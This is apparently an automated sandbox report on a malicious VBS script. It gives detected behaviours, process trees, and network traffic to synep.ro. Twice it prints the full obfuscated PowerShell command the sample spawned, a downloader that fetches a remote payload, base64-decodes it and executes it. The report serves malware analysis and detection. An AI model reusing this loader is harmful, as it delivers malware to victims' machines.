Analysis Overview
SHA256
b3cbe99653473f02e9059a76d009e0e0e88763c8cb2a8e4ddf21b189761bd6f5
Threat Level: Likely malicious
The file B3CBE99653473F02E9059A76D009E0E0E88763C8CB2A8E4DDF21B189761BD6F5 was found to be: Likely malicious.
Malicious Activity Summary
Blocklisted process makes network request
Checks computer location settings
Command and Scripting Interpreter: PowerShell
System Location Discovery: System Language Discovery
Enumerates physical storage devices
System Network Configuration Discovery: Internet Connection Discovery
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Runs ping.exe
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-13 21:21
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-13 21:21
Reported
2024-11-13 21:24
Platform
win7-20240903-en
Max time kernel
206s
Max time network
207s
Command Line
Signatures
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\ping.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\ping.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2132 wrote to memory of 2912 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\ping.exe |
| PID 2132 wrote to memory of 2912 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\ping.exe |
| PID 2132 wrote to memory of 2912 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\ping.exe |
| PID 2132 wrote to memory of 2296 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2132 wrote to memory of 2296 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2132 wrote to memory of 2296 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\B3CBE99653473F02E9059A76D009E0E0E88763C8CB2A8E4DDF21B189761BD6F5.vbs"
C:\Windows\System32\ping.exe
ping gormezl_6777.6777.6777.677e
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Stelography Boligministerielt Surterhvervet Polenkas #>;$Genforeningerne='Brasilianske';<#Decoloriser Quatrains dksmands Rentabelt #>;$Stvregne=$Orlos+$host.UI; function Udgangstilladelsernes($Lupulus){If ($Stvregne) {$setaria++;}$Revest=$Velkomstens74+$Lupulus.'Length'-$setaria; for( $Kropsvisiteret=4;$Kropsvisiteret -lt $Revest;$Kropsvisiteret+=5){$Spoilage=$Kropsvisiteret;$Salvelsesfuldest+=$Lupulus[$Kropsvisiteret];$Prototraitor='Kronvildtjagterne';}$Salvelsesfuldest;}function Skilleliniens($Knothead){ & ($Toilettaskens) ($Knothead);}$Tastetryk=Udgangstilladelsernes 'guttM ndsoUn uzPoliiCanal I clvotaaDavi/ Pen ';$Tastetryk+=Udgangstilladelsernes 'Quar5Skyd.mine0Love Ski.(Li nWFejliMul nFabrdudklo NanwF.ans a,a ProcNB,geT,lie Stem1Udru0 Dr,.Roug0Raci;Phra OffiWCensiRiddnNatu6Oakl4Be i;Ne.r FenaxOver6Ea t4Ur n;Nume UrinrGyptvFili:sta,1 Eff3Dest1Clee.Disa0Tred)Fi a HandG noneYellcJustk Siso,rep/Frod2 Sto0H.ms1Stil0Gest0 P.o1Cert0Wi t1Buri DyreFSelviDubbr G,ueH,mpf tr oUmorxL,du/Defl1conv3Post1N ws.Sikk0 Bog ';$Cellerne=Udgangstilladelsernes 'EmbrUO bys OppeQuarrErog-surfA ukkgBro E ivsN fortigna ';$Konstruktivt=Udgangstilladelsernes 'Gru.haf,at ArttB depKachsHoo,:Flit/Be.a/ GamsBatiyH lvnDeuteMa ipFinu.Fl trTohaoBef./SkosLQuacySpecsActib trgaSandd vov. PaupStr sS,anpSkij ';$Kropsvisiteretndarbejde97=Udgangstilladelsernes 'Olde>Gang ';$Toilettaskens=Udgangstilladelsernes ' ympI .ree Sa.x Raf ';$Lykkejgers='Spendynr';$Proconscriptive='\Udviklingsegnes.sep';Skilleliniens (Udgangstilladelsernes ' npa$Fuyeg Cu le,acoNaivbFinaAAkvaLTr,n:O.lltCytoAIdeamFra B Ud UUn,rRChicSBlse=Ozon$ kreSkanNP lwvGlas: staA St PWordP La D AliASn.wt P.laU,fr+trau$frynpGnisr ,enoAppecDuelO.enenKgeusF.rhC r nrOarliclump FleTswo iLym.vRefeETysk ');Skilleliniens (Udgangstilladelsernes 'Arbe$Forbg PenlHandoMinuBFackaLa sL Bil: UnmKgardOIndod eneELan k aresA skEK.ogrOml.=Bajo$Kl pknarcoCraiNSy gSChert PrerUnusUPr.lKPrint s aI ealvsammTAkti.AnidsChe,pThyml N nIOpe.TTrun(Hoo $svinkUn.orChecO no pTilfS F,rVSvinifadeS .ryiBeriTStroeAntiR .elEnoncTskifN FerDForpa.ildRGipsBSan eDampj ForDMelaEJor 9Disi7Insi)Star ');Skilleliniens (Udgangstilladelsernes ' Nov[,ufonfjldE RovtEjen.SextshunkE Marr Genv .kki C,nCDi heBronP,kspoGadiIFrowNtndit,algMInf AEkspNVeneABallg UngeFastr Gre]Wa.r:U,co: molSApplE KogC ,unuAnteRReaniDm,iT CarYKrafp E.er nheoGardtLauroTahacCivioNighLLump Rang=Outb ,usk[ StaN A.hE Ovet Wif.GcelSFormeBondc,andUS ilRArtoI ukkTToroYParoPdolorSubpOPreitcheeoFrieCSrskOLserl OddTunfoYD ospSkypeEksp]Sg f: amm:Dry,tPomeLaddos nab1Dila2 le ');$Konstruktivt=$Kodekser[0];$Slbemaalsflyvningens=(Udgangstilladelsernes 'Buat$,utwgVineLLs lO ,aaBMuriaGravLT.ia:up om TusEDrabsNondOPoluSDat.TRoofeSperTGarrHVir,i racuEmpimBol,= OstNAndre K sW Da -S orODefebNonpj phEFedeC N dTpara BadeSPermYLmleS enotfiltEPretmHj i. F rnWin eMar.T Rec. llewPosteAgnobKarmcudtolPl ai eae ,ldNAf,itHype ');Skilleliniens ($Slbemaalsflyvningens);Skilleliniens (Udgangstilladelsernes 'Indb$UntoMInhueSlags AfvoN das clatCh.pe Glut Indh lloi AkkuIn emIntr.TrolHGrateLeukaNvn,d aadeFjolrKnurs,oti[ els$Rep,C rane,alelForklErg eSvejrSrgenHyp eStam]Nico=Br s$PligTUdr aHvedsJ.rdtMaadeor rtConcrUnafyT iwkHenr ');$Egidias=Udgangstilladelsernes 'Fjer$ WheMSynteJo vsInosoZinasReast SyseCap.t Fdeh Rrei.nteuCocimcolo.Hun.DVocio endw entnOystlHelhoKommaskged atrFExaniOrphlJinge Po,(Acli$SnreK S roLoitnPernsBe,zt DisrSputuEddikEbb,tPolli HjevLuftt,kit, omb$ PleS TreuMisbbDrukcFallaGe,en FoodHen iKaradId.nl M syRaba)Kom ';$Subcandidly=$Tamburs;Skilleliniens (Udgangstilladelsernes 'Si s$GlobGVintL ecooParaB SelAS.enlHalv: FrucI oleRampME,asBBib aPhloLTossoWaxeeD gfTL anSFibr=Unfi(TidstIdeaeRevns asktLev -Gar P ,ida.dreTUrolH da Semi$PinsSKlupuElecBRur.cInteaSam n ndsdsl mIAkusD ,hol emiYTele)I fa ');while (!$Cembaloets) {Skilleliniens (Udgangstilladelsernes ' Jua$ H pgStralWitooC.rkbK,lvaPesslFo d:PrinSvi etTilboTaabcIntekVejpaO sld Re,iVir n.issg Und= A,t$SylttflokrOut uRi,eeCoul ') ;Skilleliniens $Egidias;Skilleliniens (Udgangstilladelsernes 'Bryas ocTRefeAJourRunmatApp,-SecuSSubllPoi EPreeEMonkPRenn A ge4Chia ');Skilleliniens (Udgangstilladelsernes 'Noni$a nuGU deLK,ttOhjfrbJar,A .reLRaad:kersCNjereRab MPre bStarARentlFailoRevaE D,gTAfviSthra=T an(Sigtt.iscE Ha S.ubwt Mo,-T mipSta,AUganTEntrhUnfo Sm $SvmmSBibeu GrnB crCHi tAPr cn jasdU.coiSimeDSkriLpappY ild)Nulp ') ;Skilleliniens (Udgangstilladelsernes 'Twan$HovegAstrlBiblohjreBUdl.AHallL agk:ServT geoMng,X CalI S oFbur YSulp2Euka2plun1 tra=Fje $FragGUnziLOveroFittBLagea Nv l A,f: enN M riMycotSe.spIndkiOndsCHa.hkKno.EEn idEmbi+Skin+Sa l%Inds$SphikBsnioSciadTincEUn iKBespSTjrpeE,isrCoif.AdmiC enloRa.kuIvaonPensTLide ') ;$Konstruktivt=$Kodekser[$Toxify221];}$Solidare=303621;$Polyadelph=30134;Skilleliniens (Udgangstilladelsernes 'Twa,$Di.gGStreLbyraoblombbr dASk,dLSalg:ListrFdebe aprgunvinHypoSAn,lk PusaCalibHjersBesgppejkRTun iCaconKartCV ctI perPstanp BenEUnflRRhinsPalm E t=Genn dieGIndrER ftTAb f-D scCLgeroJok NLor T ,edE OvenPartTAnon Pas$TnkesSkabU o,ebO,erc utoaBillN R vDNeigiServD Erll U.vyLuti ');Skilleliniens (Udgangstilladelsernes 'Malk$HavngPrislTessoPelvb IsoaHydrlOrdm:.teePlo ieAwaraSkifcFilsh blilFlasiM nikMacre Smi Lo,e=E jo Detr[Frg SFlngyRespsEnertUmbieE lym on.Se rCClamoDiscn L,avHu teHunkr PertAcco] ,ve:In,e:SproF uborSkyjo,ohemI agBRaadaSynasBroeeForl6Lage4Con SK ngt Kl r KamiCampnPlagg Pa (reol$EkspRLorieOutcg IgnnFo ksReagkKrimaOd nbParasAdreplnrerNonciGrannF.rac Heri arlpWindpTreveSen rNybysDyst)Pana ');Skilleliniens (Udgangstilladelsernes 'Sana$parcGStedLRevlOLgeub B aa AfkL Ket:F akTCarbIT anlLives isckUdvlRmycee.andRspris Bl ABlo.k ApiS Vole unnpy.rE UniSDoms7Angl7Unde nonc= Fru Pedu[MortS NriYInv SRaveTTin.EHun mBead.AmenTBecheE ogxJudet Gha. ExaEEp,xN sweCSoldOAbenDFlodiDyrtNUni.GIndd]S ep:Myos:NonhA B lSSistCDesaIToniI,ale. Bl G HelE MamtSynesSha.t,ovgR Ty.i StenRin gUnsy(Htbl$MeatPHeteeMet ADer CUsarhEmb L Thoi rioKHldne Ind) Tri ');Skilleliniens (Udgangstilladelsernes 'Squi$TaxiGUdd lKommoEntrBOperAKasklParf:Jun u ornMinuT imiUE emFK ostBandeBuredMe.a= la$ BefTFastIRewaLsyndsPillkMashrAmt eTi.frHavesSpeaA T ikOverSHv,dEKritnRo kE fssSe,i7Dech7Caus.N,nnsDan UFiskB KotsRg ot ndRultriUbalN.araG Whi( al$ HagsUdtrointelUgesi TrsDUndeaTranrbl ee Phe, Bur$Ark.pPit OQu flIndkY Palalownd .uoeM sslKastPB seHOp r)Sup. ');Skilleliniens $Untufted;"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | gormezl_6777.6777.6777.677e | udp |
| US | 8.8.8.8:53 | synep.ro | udp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\CabCE39.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
memory/2296-20-0x000007FEF682E000-0x000007FEF682F000-memory.dmp
memory/2296-21-0x000000001B640000-0x000000001B922000-memory.dmp
memory/2296-22-0x0000000001ED0000-0x0000000001ED8000-memory.dmp
memory/2296-23-0x000007FEF6570000-0x000007FEF6F0D000-memory.dmp
memory/2296-24-0x000007FEF6570000-0x000007FEF6F0D000-memory.dmp
memory/2296-25-0x000007FEF6570000-0x000007FEF6F0D000-memory.dmp
memory/2296-26-0x000007FEF6570000-0x000007FEF6F0D000-memory.dmp
memory/2296-27-0x000007FEF6570000-0x000007FEF6F0D000-memory.dmp
memory/2296-28-0x000007FEF6570000-0x000007FEF6F0D000-memory.dmp
memory/2296-29-0x000007FEF682E000-0x000007FEF682F000-memory.dmp
memory/2296-30-0x000007FEF6570000-0x000007FEF6F0D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-13 21:21
Reported
2024-11-13 21:25
Platform
win10ltsc2021-20241023-en
Max time kernel
99s
Max time network
210s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\ping.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\ping.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3092 wrote to memory of 5124 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\ping.exe |
| PID 3092 wrote to memory of 5124 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\ping.exe |
| PID 3092 wrote to memory of 472 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3092 wrote to memory of 472 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\B3CBE99653473F02E9059A76D009E0E0E88763C8CB2A8E4DDF21B189761BD6F5.vbs"
C:\Windows\System32\ping.exe
ping gormezl_6777.6777.6777.677e
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Stelography Boligministerielt Surterhvervet Polenkas #>;$Genforeningerne='Brasilianske';<#Decoloriser Quatrains dksmands Rentabelt #>;$Stvregne=$Orlos+$host.UI; function Udgangstilladelsernes($Lupulus){If ($Stvregne) {$setaria++;}$Revest=$Velkomstens74+$Lupulus.'Length'-$setaria; for( $Kropsvisiteret=4;$Kropsvisiteret -lt $Revest;$Kropsvisiteret+=5){$Spoilage=$Kropsvisiteret;$Salvelsesfuldest+=$Lupulus[$Kropsvisiteret];$Prototraitor='Kronvildtjagterne';}$Salvelsesfuldest;}function Skilleliniens($Knothead){ & ($Toilettaskens) ($Knothead);}$Tastetryk=Udgangstilladelsernes 'guttM ndsoUn uzPoliiCanal I clvotaaDavi/ Pen ';$Tastetryk+=Udgangstilladelsernes 'Quar5Skyd.mine0Love Ski.(Li nWFejliMul nFabrdudklo NanwF.ans a,a ProcNB,geT,lie Stem1Udru0 Dr,.Roug0Raci;Phra OffiWCensiRiddnNatu6Oakl4Be i;Ne.r FenaxOver6Ea t4Ur n;Nume UrinrGyptvFili:sta,1 Eff3Dest1Clee.Disa0Tred)Fi a HandG noneYellcJustk Siso,rep/Frod2 Sto0H.ms1Stil0Gest0 P.o1Cert0Wi t1Buri DyreFSelviDubbr G,ueH,mpf tr oUmorxL,du/Defl1conv3Post1N ws.Sikk0 Bog ';$Cellerne=Udgangstilladelsernes 'EmbrUO bys OppeQuarrErog-surfA ukkgBro E ivsN fortigna ';$Konstruktivt=Udgangstilladelsernes 'Gru.haf,at ArttB depKachsHoo,:Flit/Be.a/ GamsBatiyH lvnDeuteMa ipFinu.Fl trTohaoBef./SkosLQuacySpecsActib trgaSandd vov. PaupStr sS,anpSkij ';$Kropsvisiteretndarbejde97=Udgangstilladelsernes 'Olde>Gang ';$Toilettaskens=Udgangstilladelsernes ' ympI .ree Sa.x Raf ';$Lykkejgers='Spendynr';$Proconscriptive='\Udviklingsegnes.sep';Skilleliniens (Udgangstilladelsernes ' npa$Fuyeg Cu le,acoNaivbFinaAAkvaLTr,n:O.lltCytoAIdeamFra B Ud UUn,rRChicSBlse=Ozon$ kreSkanNP lwvGlas: staA St PWordP La D AliASn.wt P.laU,fr+trau$frynpGnisr ,enoAppecDuelO.enenKgeusF.rhC r nrOarliclump FleTswo iLym.vRefeETysk ');Skilleliniens (Udgangstilladelsernes 'Arbe$Forbg PenlHandoMinuBFackaLa sL Bil: UnmKgardOIndod eneELan k aresA skEK.ogrOml.=Bajo$Kl pknarcoCraiNSy gSChert PrerUnusUPr.lKPrint s aI ealvsammTAkti.AnidsChe,pThyml N nIOpe.TTrun(Hoo $svinkUn.orChecO no pTilfS F,rVSvinifadeS .ryiBeriTStroeAntiR .elEnoncTskifN FerDForpa.ildRGipsBSan eDampj ForDMelaEJor 9Disi7Insi)Star ');Skilleliniens (Udgangstilladelsernes ' Nov[,ufonfjldE RovtEjen.SextshunkE Marr Genv .kki C,nCDi heBronP,kspoGadiIFrowNtndit,algMInf AEkspNVeneABallg UngeFastr Gre]Wa.r:U,co: molSApplE KogC ,unuAnteRReaniDm,iT CarYKrafp E.er nheoGardtLauroTahacCivioNighLLump Rang=Outb ,usk[ StaN A.hE Ovet Wif.GcelSFormeBondc,andUS ilRArtoI ukkTToroYParoPdolorSubpOPreitcheeoFrieCSrskOLserl OddTunfoYD ospSkypeEksp]Sg f: amm:Dry,tPomeLaddos nab1Dila2 le ');$Konstruktivt=$Kodekser[0];$Slbemaalsflyvningens=(Udgangstilladelsernes 'Buat$,utwgVineLLs lO ,aaBMuriaGravLT.ia:up om TusEDrabsNondOPoluSDat.TRoofeSperTGarrHVir,i racuEmpimBol,= OstNAndre K sW Da -S orODefebNonpj phEFedeC N dTpara BadeSPermYLmleS enotfiltEPretmHj i. F rnWin eMar.T Rec. llewPosteAgnobKarmcudtolPl ai eae ,ldNAf,itHype ');Skilleliniens ($Slbemaalsflyvningens);Skilleliniens (Udgangstilladelsernes 'Indb$UntoMInhueSlags AfvoN das clatCh.pe Glut Indh lloi AkkuIn emIntr.TrolHGrateLeukaNvn,d aadeFjolrKnurs,oti[ els$Rep,C rane,alelForklErg eSvejrSrgenHyp eStam]Nico=Br s$PligTUdr aHvedsJ.rdtMaadeor rtConcrUnafyT iwkHenr ');$Egidias=Udgangstilladelsernes 'Fjer$ WheMSynteJo vsInosoZinasReast SyseCap.t Fdeh Rrei.nteuCocimcolo.Hun.DVocio endw entnOystlHelhoKommaskged atrFExaniOrphlJinge Po,(Acli$SnreK S roLoitnPernsBe,zt DisrSputuEddikEbb,tPolli HjevLuftt,kit, omb$ PleS TreuMisbbDrukcFallaGe,en FoodHen iKaradId.nl M syRaba)Kom ';$Subcandidly=$Tamburs;Skilleliniens (Udgangstilladelsernes 'Si s$GlobGVintL ecooParaB SelAS.enlHalv: FrucI oleRampME,asBBib aPhloLTossoWaxeeD gfTL anSFibr=Unfi(TidstIdeaeRevns asktLev -Gar P ,ida.dreTUrolH da Semi$PinsSKlupuElecBRur.cInteaSam n ndsdsl mIAkusD ,hol emiYTele)I fa ');while (!$Cembaloets) {Skilleliniens (Udgangstilladelsernes ' Jua$ H pgStralWitooC.rkbK,lvaPesslFo d:PrinSvi etTilboTaabcIntekVejpaO sld Re,iVir n.issg Und= A,t$SylttflokrOut uRi,eeCoul ') ;Skilleliniens $Egidias;Skilleliniens (Udgangstilladelsernes 'Bryas ocTRefeAJourRunmatApp,-SecuSSubllPoi EPreeEMonkPRenn A ge4Chia ');Skilleliniens (Udgangstilladelsernes 'Noni$a nuGU deLK,ttOhjfrbJar,A .reLRaad:kersCNjereRab MPre bStarARentlFailoRevaE D,gTAfviSthra=T an(Sigtt.iscE Ha S.ubwt Mo,-T mipSta,AUganTEntrhUnfo Sm $SvmmSBibeu GrnB crCHi tAPr cn jasdU.coiSimeDSkriLpappY ild)Nulp ') ;Skilleliniens (Udgangstilladelsernes 'Twan$HovegAstrlBiblohjreBUdl.AHallL agk:ServT geoMng,X CalI S oFbur YSulp2Euka2plun1 tra=Fje $FragGUnziLOveroFittBLagea Nv l A,f: enN M riMycotSe.spIndkiOndsCHa.hkKno.EEn idEmbi+Skin+Sa l%Inds$SphikBsnioSciadTincEUn iKBespSTjrpeE,isrCoif.AdmiC enloRa.kuIvaonPensTLide ') ;$Konstruktivt=$Kodekser[$Toxify221];}$Solidare=303621;$Polyadelph=30134;Skilleliniens (Udgangstilladelsernes 'Twa,$Di.gGStreLbyraoblombbr dASk,dLSalg:ListrFdebe aprgunvinHypoSAn,lk PusaCalibHjersBesgppejkRTun iCaconKartCV ctI perPstanp BenEUnflRRhinsPalm E t=Genn dieGIndrER ftTAb f-D scCLgeroJok NLor T ,edE OvenPartTAnon Pas$TnkesSkabU o,ebO,erc utoaBillN R vDNeigiServD Erll U.vyLuti ');Skilleliniens (Udgangstilladelsernes 'Malk$HavngPrislTessoPelvb IsoaHydrlOrdm:.teePlo ieAwaraSkifcFilsh blilFlasiM nikMacre Smi Lo,e=E jo Detr[Frg SFlngyRespsEnertUmbieE lym on.Se rCClamoDiscn L,avHu teHunkr PertAcco] ,ve:In,e:SproF uborSkyjo,ohemI agBRaadaSynasBroeeForl6Lage4Con SK ngt Kl r KamiCampnPlagg Pa (reol$EkspRLorieOutcg IgnnFo ksReagkKrimaOd nbParasAdreplnrerNonciGrannF.rac Heri arlpWindpTreveSen rNybysDyst)Pana ');Skilleliniens (Udgangstilladelsernes 'Sana$parcGStedLRevlOLgeub B aa AfkL Ket:F akTCarbIT anlLives isckUdvlRmycee.andRspris Bl ABlo.k ApiS Vole unnpy.rE UniSDoms7Angl7Unde nonc= Fru Pedu[MortS NriYInv SRaveTTin.EHun mBead.AmenTBecheE ogxJudet Gha. ExaEEp,xN sweCSoldOAbenDFlodiDyrtNUni.GIndd]S ep:Myos:NonhA B lSSistCDesaIToniI,ale. Bl G HelE MamtSynesSha.t,ovgR Ty.i StenRin gUnsy(Htbl$MeatPHeteeMet ADer CUsarhEmb L Thoi rioKHldne Ind) Tri ');Skilleliniens (Udgangstilladelsernes 'Squi$TaxiGUdd lKommoEntrBOperAKasklParf:Jun u ornMinuT imiUE emFK ostBandeBuredMe.a= la$ BefTFastIRewaLsyndsPillkMashrAmt eTi.frHavesSpeaA T ikOverSHv,dEKritnRo kE fssSe,i7Dech7Caus.N,nnsDan UFiskB KotsRg ot ndRultriUbalN.araG Whi( al$ HagsUdtrointelUgesi TrsDUndeaTranrbl ee Phe, Bur$Ark.pPit OQu 